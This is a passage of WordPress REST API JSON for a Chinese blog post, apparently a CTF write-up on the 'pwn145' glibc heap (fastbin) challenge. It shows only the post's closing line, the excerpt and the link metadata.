\/><\/div><\/figure>\n\n\n\n<p><br>\u597d\u4e86\uff0cfastbin\u5c31\u5230\u8fd9\u513f\uff0c\u8981\u8003\u6982\u7387\u8bba\u4e86TAT<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1\u3001pwn145 \u6ca1\u94b1\u4e86\u5b69\u5b50\u4eec\uff0c\u53ea\u80fd\u672c\u5730\u73a9\u73a9\u4e86 \u7ee7\u7eed\u5b66\u4e60\u5806\uff0c\u8fd9\u9053\u9898\u7684\u63d0\u793a\u662f\uff1aglibc\u7684\u4e00\u79cd\u5206\u914d\u89c4\u5219 \u9996\u5148\u67e5\u67e5 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":791,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4,6],"class_list":["post-737","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn","tag-6"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=737"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737\/revisions"}],"predecessor-version":[{"id":789,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/737\/revisions\/789"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/791"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=737"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=737"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=737"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}